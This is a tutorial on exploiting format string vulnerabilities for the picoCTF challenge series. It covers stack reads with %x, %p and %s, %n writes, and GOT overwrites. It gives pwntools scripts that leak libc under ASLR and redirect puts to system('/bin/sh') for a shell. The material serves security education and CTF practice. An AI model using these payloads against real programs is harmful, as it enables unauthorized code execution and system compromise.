Format String Vulnerabilities for CTF Binary Exploitation

Introduction

A format string vulnerability occurs when a C program passes user-controlled input directly as the first argument to printf or a related function. Instead of treating the input as data to print, printf interprets it as a format string and acts on any % specifiers it contains. An attacker can use this to read arbitrary memory and, in some cases, write to any address in the process.

This vulnerability class is at the heart of the picoCTF format string series: format string 0, format string 1, format string 2, and format string 3. Each challenge adds one more concept. Work through them in order.

How printf works

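The printf family of functions reads a format string and consumes one additional argument for each format specifier. On 32-bit x86 those arguments come from the call stack; on x86-64 the first few come from registers and the rest from the stack. When called correctly it looks like this: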

printf("%s scored %d points", username, score);
// The format string is a string literal, not user input.

The vulnerable version passes user input as the format string:

char buf[256];
fgets(buf, sizeof(buf), stdin);
printf(buf);   // BUG: buf is user-controlled

When printf encounters %s in the format string it looks on the stack for the next argument (a pointer to a string) and dereferences it. If the caller never provided that argument, printf reads whatever happens to be on the stack at that position, which is attacker-readable process memory.

Note: The vulnerability requires that the attacker controls the format string. If printf("%s", buf) is used instead, the input is always treated as a plain string and no specifiers are interpreted.

Reading memory with %x and %s

Send %x specifiers to dump stack values as hex integers. Each %x consumes one word from the stack:

$ echo '%x %x %x %x %x %x %x %x' | ./vulnerable
f7f9e580 0 0 0 f7f5a700 25207825 78252078 20782520
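The trailing words in a dump like this are often the format string itself, read back as little-endian integers. The following is a minimal Python sketch (standard library only) that decodes two of the words shown above, assuming a 32-bit little-endian target. The helper name words_to_bytes is made up for illustration.

```python
import struct

def words_to_bytes(hex_words):
    """Reassemble 32-bit little-endian stack words into the raw bytes they hold."""
    return b''.join(struct.pack('<I', int(w, 16)) for w in hex_words)

# Two of the words from the dump above.
decoded = words_to_bytes(['25207825', '78252078'])
print(decoded)  # b'%x %x %x'
```

Seeing your own specifiers in the output is a sign that the dump has reached the input buffer.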

Use %p instead of %x to get pointer-width output with a 0x prefix. This matters on 64-bit systems, where %x prints only the low 32 bits of each value:

$ echo '%p %p %p %p %p %p' | ./vulnerable

If you want to read from a specific stack offset without cycling through all the preceding ones, use the positional argument syntax %N$x where N is the index:

$ echo '%6$x' | ./vulnerable   # read the 6th stack word
$ echo '%6$p' | ./vulnerable   # same, as a pointer
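When you need to probe a range of positions, typing the specifiers by hand gets tedious. A small Python sketch that generates a positional probe string is shown here; the function name positional_probe and the '.' separator are arbitrary choices, not part of any tool.

```python
def positional_probe(first, last, spec='p', sep='.'):
    """Build '%first$p.%(first+1)$p...' covering positions first..last inclusive."""
    return sep.join(f'%{i}${spec}' for i in range(first, last + 1))

print(positional_probe(1, 4))  # %1$p.%2$p.%3$p.%4$p
```

Keep the result inside single quotes when passing it through a shell so that $p is not expanded as a variable.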

To dereference a pointer on the stack and read the string it points to, use %s:

$ echo '%6$s' | ./vulnerable   # dereference the 6th stack word as a string

Warning: %s will crash the program if the value at the target position is not a valid readable pointer. Use %x or %p first to identify which positions hold addresses, then dereference specific ones.

Finding the format string offset

The key skill in format string exploitation is finding the offset at which your own input appears on the stack. Once you know it, you can place an address in the input and use %N$s to dereference it, or %N$n to write to it.

The technique is to start the input with a recognizable marker like AAAA (hex value 0x41414141) and then scan the stack output for that value:

$ echo 'AAAA %x %x %x %x %x %x %x %x %x %x' | ./vulnerable
AAAA f7f9e580 0 0 0 f7f5a700 41414141 20782520 ...
#                            ^^^^^^^^
#                  This is our AAAA, at position 6

In the example above, our marker appears at the 6th position. We can confirm this with:

$ echo 'AAAA %6$x' | ./vulnerable
AAAA 41414141   # confirmed: offset is 6

On 64-bit systems, use 8-byte markers (e.g. AAAAAAAA, hex 0x4141414141414141) and look for them in the %p output.
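Scanning the output by eye works, but the search is easy to script. The sketch below assumes the program echoes the marker first and then prints space-separated %x or %p values; find_marker_offset is a hypothetical helper name.

```python
def find_marker_offset(leak_line, marker=b'AAAA'):
    """Return the 1-indexed position of the marker in the leak output, or None.

    Assumes the first token is the echoed marker and the rest are hex values.
    """
    want = int.from_bytes(marker, 'little')
    tokens = leak_line.split()[1:]          # drop the echoed marker text
    for position, token in enumerate(tokens, start=1):
        try:
            value = int(token, 16)          # accepts both '41414141' and '0x41414141'
        except ValueError:                  # e.g. '(nil)' printed by %p
            continue
        if value == want:
            return position
    return None

print(find_marker_offset('AAAA f7f9e580 0 0 0 f7f5a700 41414141'))  # 6
```

If the marker is not aligned to a word boundary it will straddle two positions and this exact match will miss it; adding one to three padding bytes before the marker usually fixes that.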

Writing with %n

The %n specifier writes the number of bytes printed so far, as a 4-byte int, to the address held in the argument it consumes. This turns a read vulnerability into an arbitrary write. If you can place a target address at a known stack offset, %N$n will write to it.

The value written equals the number of characters already output by printf. Use width padding to control it. For example, to write the value 100 (0x64):

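# Format string fragment: print 100 characters, then write that count
# to the pointer at stack offset 6
%100c%6$n
# If the 4-byte target address is printed earlier in the same payload, it counts
# toward the total, so the padding shrinks to %96c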

To write larger values (like a function address), use %hn (write 2 bytes) or split the write into multiple partial writes, one 2-byte chunk at a time. This is the basis of the GOT (Global Offset Table) overwrite technique used in format string 3.
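The padding arithmetic for a split write can be sketched in a few lines of Python. This is an illustration for a 32-bit target only, assuming the buffer starts at the given stack position and that the packed addresses contain no NUL or newline bytes. The function name and the sample address and value are hypothetical. In real exploits pwntools' fmtstr_payload does this work.

```python
import struct

def build_hn_payload_32(addr, value, offset):
    """Write a 32-bit value to addr using two %hn writes (32-bit target sketch)."""
    # Two target addresses go first: low half at addr, high half at addr + 2.
    payload = struct.pack('<II', addr, addr + 2)
    printed = len(payload)                  # these 8 bytes already count toward %n
    halves = [(value & 0xffff, offset), ((value >> 16) & 0xffff, offset + 1)]
    # Write the smaller half first so the running count only has to grow.
    for target, position in sorted(halves):
        pad = (target - printed) % 0x10000  # wraps if the count is already past target
        if pad:
            payload += b'%' + str(pad).encode() + b'c'
        payload += b'%' + str(position).encode() + b'$hn'
        printed += pad
    return payload

# Hypothetical GOT entry and function address, for illustration only.
payload = build_hn_payload_32(0x0804a010, 0x080491e6, 6)
print(payload)
```

Here the high half (0x0804 = 2052) is written first with 2044 bytes of padding after the 8 address bytes, then the low half (0x91e6 = 37350) with a further 35298 bytes.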

Tip: Use checksec (shipped with pwntools) to check whether the binary has RELRO. Full RELRO makes the GOT read-only after dynamic linking, preventing GOT overwrites. Partial RELRO, which is common in CTF binaries, leaves the function-pointer entries writable.

GOT and PLT primer

The GOT overwrite technique used in format string 3 requires understanding two tables that exist in every dynamically linked Linux binary.

The PLT (Procedure Linkage Table)

When a binary calls a shared library function like puts, it does not call the real puts directly. Instead it calls a stub in the PLT, which looks up the real address in the GOT and jumps to it. The PLT address for a function is fixed and can be found with:

objdump -d ./binary | grep '<puts@plt>'
# Example: 0000000000401030 <puts@plt>

The GOT (Global Offset Table)

The GOT is a writable table of pointers. When the dynamic linker resolves puts for the first time, it writes the real address of puts into a GOT entry. Every subsequent call goes through the PLT stubs and reads from the GOT. On a binary with Partial RELRO, these GOT entries are writable after startup.

# Find the GOT entry address for a function:
objdump -R ./binary | grep puts
# Example: 0000000000404018 R_X86_64_JUMP_SLOT  puts@GLIBC
#           ^^^^^^^^^^^^^^^^ this is the GOT entry you want to overwrite
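If you prefer to collect these addresses in a script rather than reading them off the terminal, the objdump -R output is easy to parse. The sketch below is one possible approach and works on the example line above; got_entries is a made-up helper name. With pwntools installed, ELF('./binary').got gives the same information directly.

```python
import re

def got_entries(objdump_output):
    """Map symbol name -> GOT entry address from `objdump -R` text (JUMP_SLOT rows only)."""
    entries = {}
    for line in objdump_output.splitlines():
        m = re.match(r'\s*([0-9a-fA-F]+)\s+R_\w+_JUMP_SLOT\s+([^@\s]+)', line)
        if m:
            entries[m.group(2)] = int(m.group(1), 16)
    return entries

sample = '0000000000404018 R_X86_64_JUMP_SLOT  puts@GLIBC'
print(hex(got_entries(sample)['puts']))  # 0x404018
```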

Why overwriting the GOT gives code execution

If you overwrite the GOT entry for puts with the address of system, then the next time the binary calls puts(something), it actually calls system(something). If you control what string is passed to puts, you pass "/bin/sh" and get a shell.

from pwn import *
context.arch = 'amd64'     # match the target; fmtstr_payload depends on it
offset = 6                 # placeholder: stack position of your buffer
# Step 1: find the GOT entry to overwrite
GOT_puts = 0x404018    # from objdump -R
# Step 2: find the address to write (system from libc, or win() from binary)
system_addr = 0xdeadbeef   # placeholder; see 'Leaking a libc address with ASLR' below
# Step 3: build the format string payload
payload = fmtstr_payload(offset, {GOT_puts: system_addr})

Tip: Run checksec ./binary first. Full RELRO makes the GOT read-only, blocking this attack. Partial RELRO (the default in most CTF binaries) leaves it writable. No RELRO means even the .got section is writable.

Leaking a libc address with ASLR

When ASLR is enabled, the address of system changes every run. You cannot hardcode it. The format string read primitive gives you a way to leak a runtime address and compute the correct system address dynamically.
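The computation itself is plain subtraction and addition: libc is loaded as one contiguous block, so the distance between any two of its symbols is the same on every run. A minimal sketch with made-up numbers follows; the function name and all three constants are hypothetical, and real offsets come from the libc file the target actually uses.

```python
def resolve_from_leak(leaked_addr, leaked_symbol_offset, wanted_symbol_offset):
    """Return (libc_base, wanted_addr) given one leaked runtime address.

    The two offsets are the symbols' positions inside the libc file.
    """
    libc_base = leaked_addr - leaked_symbol_offset
    # Shared libraries are mapped on page boundaries, so a correct base ends in 000.
    if libc_base & 0xfff:
        raise ValueError('base is not page-aligned; wrong libc or wrong symbol?')
    return libc_base, libc_base + wanted_symbol_offset

# Made-up numbers for illustration only.
base, system_addr = resolve_from_leak(0x7f3a1c260770, 0x60770, 0x50d70)
print(hex(base), hex(system_addr))  # 0x7f3a1c200000 0x7f3a1c250d70
```

The page-alignment check is a cheap sanity test: a base that does not end in 000 almost always means the local libc differs from the one on the target.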

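The full workflow for a non-PIE binary with ASLR and Partial RELRO (with PIE you would also need to leak the binary's own base address before using its GOT addresses):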

from pwn import *
elf  = ELF('./vulnerable')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')   # must match the libc the target uses
context.binary = elf   # tells fmtstr_payload to build a 64-bit payload
p    = process('./vulnerable')
# Assumes the program reads input and calls printf on it in a loop.
# --- Round 1: leak a libc address ---
# The GOT entry for printf holds the runtime address of printf in libc.
# Use %s at the right offset to dereference and print it.
# First, find offset where your buffer appears on the stack (use AAAAAAAA + %p chain).
offset = 6
# Build a leak payload that reads the GOT entry for printf:
GOT_printf = elf.got['printf']
# On 64-bit the packed address contains NUL bytes, which end the format string.
# So the specifier goes first, padded to 8 bytes, and the address lands at offset + 1.
spec = b'%' + str(offset + 1).encode() + b'$s'
leak_payload = spec.ljust(8, b'|') + p64(GOT_printf)
# fmtstr_payload cannot do reads; build this manually.
p.sendline(leak_payload)
# %s prints the address bytes up to the first NUL; the '|' padding marks the end.
leak = u64(p.recvuntil(b'|', drop=True).ljust(8, b'\x00'))
# --- Compute libc base from the leak ---
libc.address = leak - libc.symbols['printf']
system_addr  = libc.symbols['system']
bin_sh_addr  = next(libc.search(b'/bin/sh'))   # not needed here; useful for other targets
# --- Round 2: GOT overwrite ---
write_payload = fmtstr_payload(offset, {elf.got['puts']: system_addr})
p.sendline(write_payload)
# Next call to puts('/bin/sh') becomes system('/bin/sh')
p.sendline(b'/bin/sh')
p.interactive()

Note: The 64-bit version of this attack is trickier than 32-bit because the first six integer arguments are passed in registers, not on the stack. The format string itself takes the first register, so %1$p through %5$p print register values and %6$p is the first stack word. Your format string buffer is typically at offset 6 or higher. Use %p %p %p ... to map the stack and find where the buffer appears, then adjust offset accordingly.
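A second 64-bit complication is that packed addresses contain NUL bytes, and printf stops reading its format string at the first NUL. The usual workaround is to put the specifier first and the address last. The sketch below shows that layout under the assumption that the buffer starts exactly at buf_offset; the function name is hypothetical and the address is the example GOT entry used earlier.

```python
import struct

def build_read_payload_64(addr, buf_offset):
    """Return '%N$s' padded to an 8-byte boundary, followed by the target address.

    buf_offset is the position at which the start of the buffer appears.
    """
    slots = 1                               # 8-byte slots reserved for the specifier
    while True:
        spec = f'%{buf_offset + slots}$s'.encode()
        if len(spec) <= slots * 8:
            break
        slots += 1
    # Pad with a visible delimiter so the leaked bytes are easy to cut out of the output.
    return spec.ljust(slots * 8, b'|') + struct.pack('<Q', addr)

payload = build_read_payload_64(0x404018, 6)
print(payload)
```

With the buffer at position 6, the 8-byte specifier block occupies position 6 and the address sits at position 7, which is why the specifier reads %7$s.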

Automating with pwntools

pwntools is a Python library for writing exploit scripts. It handles process I/O, socket connections, and format string payload generation:

pip install pwntools

from pwn import *
context.binary = ELF('./vulnerable')   # sets 32/64-bit mode for fmtstr_payload
# Connect to a local process or remote server
p = process('./vulnerable')
# p = remote('challenge.picoctf.org', 12345)
# Send a format string to leak stack values
p.sendline(b'%p %p %p %p %p %p')
leak = p.recvline()
print(leak)
# Build a format string payload that writes target_value to target_addr
# offset = the stack index where your buffer appears
# Placeholder values: replace all three with the ones for your binary
offset       = 6
target_addr  = 0x404018
target_value = 0x401196
payload = fmtstr_payload(offset, {target_addr: target_value})
p.sendline(payload)
p.interactive()

The fmtstr_payload function from pwntools builds the entire payload for you, handling the address placement, padding arithmetic, and split writes needed to overwrite arbitrary memory. The only inputs you need are the stack offset and a dictionary of address: value pairs to write.

The picoCTF format string series

format string 0 (Easy)

Introduces the bug conceptually. Feeding the program the right format string input crashes it in a way that prints the flag. No memory reading required.

format string 1 (Medium)

Read a secret value off the stack using %x specifiers. Practice scanning for a recognizable pattern in the leak output.

format string 2 (Medium)

Overwrite a specific variable in memory using %n. Introduces the concept of writing to a known address by placing it in the input buffer.

format string 3 (Medium)

Full GOT overwrite. Redirect a library function pointer to system so that the next call to the original function instead spawns a shell.

Mitigations

Modern compilers and operating systems include several defenses against format string exploits:

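-Wformat-security: GCC warns when printf is called with a non-literal format string and no format arguments. It takes effect together with -Wformat (part of -Wall), and some distributions, such as Ubuntu, enable it by default.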
Full RELRO: marks the GOT read-only after dynamic linking, preventing GOT overwrites.
ASLR: randomizes where the stack and libraries are loaded, so target addresses cannot be hardcoded. An attacker must first leak an address to get around it.
Stack canaries: detect adjacent buffer overflows but do not directly mitigate format string writes.

Tip: Run checksec ./binary (pwntools) to see which mitigations are active on a CTF binary. Partial RELRO with no PIE is the classic easy-mode setup; Full RELRO with PIE and ASLR requires leaking an address first and picking a write target other than the GOT.

Quick reference

Specifier	Effect
%x	Print the next stack word as hex
%p	Print the next stack word as a pointer (0x...)
%s	Dereference the next stack word as a string pointer
%n	Write the bytes-printed count to the next stack pointer
%hn	Write 2 bytes (short) instead of 4
%hhn	Write 1 byte
%N$x	Print the Nth stack word (1-indexed) as hex
%Nc	Print one character padded to width N (controls write value for %n)
fmtstr_payload(off, {addr: val})	pwntools: build a complete write payload